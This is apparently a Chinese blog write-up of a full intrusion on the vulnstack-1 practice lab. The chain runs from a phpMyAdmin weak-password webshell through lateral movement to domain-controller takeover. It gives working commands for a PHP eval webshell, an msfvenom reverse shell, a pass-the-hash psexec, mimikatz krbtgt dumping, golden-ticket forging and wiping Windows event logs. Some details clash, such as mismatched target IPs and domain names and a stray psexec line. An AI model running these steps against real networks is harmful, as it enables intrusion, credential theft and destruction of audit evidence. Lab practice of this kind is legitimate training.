内网渗透-红日靶场-vulnstack-1
记录一次完整的渗透测试过程:从外网Web打点到内网横向移动。首先通过Kali和Win7靶机渗透测试流程概述通过Kali和Win7靶机搭建环境,发现phpmyadmin弱口令漏洞并getshell。内网探测发现52网段存活主机,利用MSF木马横向移动。收集域信息、抓取密码、制作黄金票据,最终控制域控。涉及端口扫描、漏洞利用、隧道搭建、横向移动及日志清理。
基本环境配置
|
主机 |
ip |
网卡 |
|
kali |
192.168.10.185 |
桥接 |
|
win7 |
192.168.10.186&192.168.52.139 |
桥接&仅主机 |
|
Win2k3 |
192.168.52.141 |
仅主机 |
|
Windows2008 |
192.168.52.140 |
仅主机 |
启动靶机windows7
密码:hongrisec@2019
启动windows7 的web环境
关闭防火墙
web 打点
目标:192.168.10.171
发现了多个开启的端口
80:发现如下页面,是 win7 系统
目录扫描后发现:
敏感信息:
ttp://192.168.10.171/phpmyadmin/changelog
http://192.168.10.171/phpmyadmin/license 
http://192.168.10.171/phpmyadmin/
数据库版本信息
对phpmyadmin渗透
测试弱口令:root/root:
因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003
这里用常用方法getshell:https://www.freebuf.com/articles/web/226240.html
发现了它的日志保存目录
show variables like '%general%';
general_log:日志保存状态(这里为off)
general_log_file:日志保存路径
开启日志保存并配置保存路径
set global general_log = "ON";
set global general_log_file = "C:/phpStudy/WWW/log.php";
select '<?php eval($_POST[pwd]); ?>';
用 webshell 连接
对 xycms 渗透
访问:
公告信息:
找一下后台登陆点测试:
成功进入后台
测试一圈无果之后,在这里找到了可直接修改的 php 文件
写入一句话木马,然后在目录中的这里找到:
访问:
192.168.10.171/yxcms/protected/apps/default/view/default/info.php
内网渗透
上传一个 fshan 扫一下 52 网段
发现了192.168.52.140 和 192.168.52.141 存活
信息收集:
判断主机是否加入域
方法一:
net time /domain
#如果当前主机处于工作组中未加入域,则显示找不到域控制器
#加入了域,且当前用户为本地用户包括本地管理员,则显示拒绝访问
加入了域,且当前用户域用户,则显示域控的时间方法二:
net config workstation
#如果命令返回信息中包含“工作站域”,则说明该计算机已经加入了域。
看下网段:发现内网网段
方法三:
echo %userdomain%
msf 上线
生成可执行文件,并上传到该目录下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.185 LPORT=4444 -f exe -o shell.exe
msfconsole -qx "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.10.185; set LPORT 4444; run"
成功上线 msf
psexec.exe lisi@172.16.6.104 -hashes aad3b435b51404eeaad3b435b51404ee:84df2a721ee8c951dfad60922f647f38提权:getsystem
搭建隧道
background
使用sockes模块:
use auxiliary/server/socks_proxy
set srvport 1050
run
配置:
vim /etc/proxychains4.conf
添加:
内网探测
使用nmap探测一下:存在防火墙
proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.138
proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.141
上线cs横向移动(成功)
生成cs马
上线 cs
抓取明文密码
抓取结果
创建一个 smb 监听
psexec 使用明文密码横移
成功上线域控机器
另一台机器同样操作,也成功上线
尝试使用 msf 横向移动失败
黄金票据权限维持
ipconfig /all 获取域名
shell whoami /user 域控得SID值
# krbtgt的密码hash
mimikatz "privilege::debug" "lsadump::dcsync /user:krbtgt"
或
lsadump::dcsync /user:CN=krbtgt,CN=Users,DC=xiaodi,DC=org
mimikatz "kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-18 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:adminse1" "exit"
# 或
mimikatz "kerberos::golden /user:要伪造的用户名 /domain:域名 /sid:SID /krbtgt:hash值 /ticket:adminse" "exit"
#生成伪造票据文件
# 参数解释:
# /ptt 直接导入到内存中
# /domain 域名
# /sid SID
# /krbtgt krbtgt的hash值
# /ticket 票据名称
# /user 要伪造的用户名
# /id 用户RID
# /groups 组信息
成功生成我们的黄金票据
痕迹清理
shell wevtutil cl security //清理安全日志
shell wevtutil cl system //清理系统日志
shell wevtutil cl application //清理应用程序日志
shell wevtutil cl "windows powershell" //清除power shell日志
shell wevtutil cl Setup //清除(cl)事件日志中的 "Setup" 事件。在实战或者攻防演练中,痕迹清理是重要一步, 至此我们的靶场到此全部打穿
电影级数字人,免显卡端渲染SDK,十行代码即可调用,工业级demo免费开源下载!
更多推荐
22
0- 0
已为社区贡献1条内容
所有评论(0)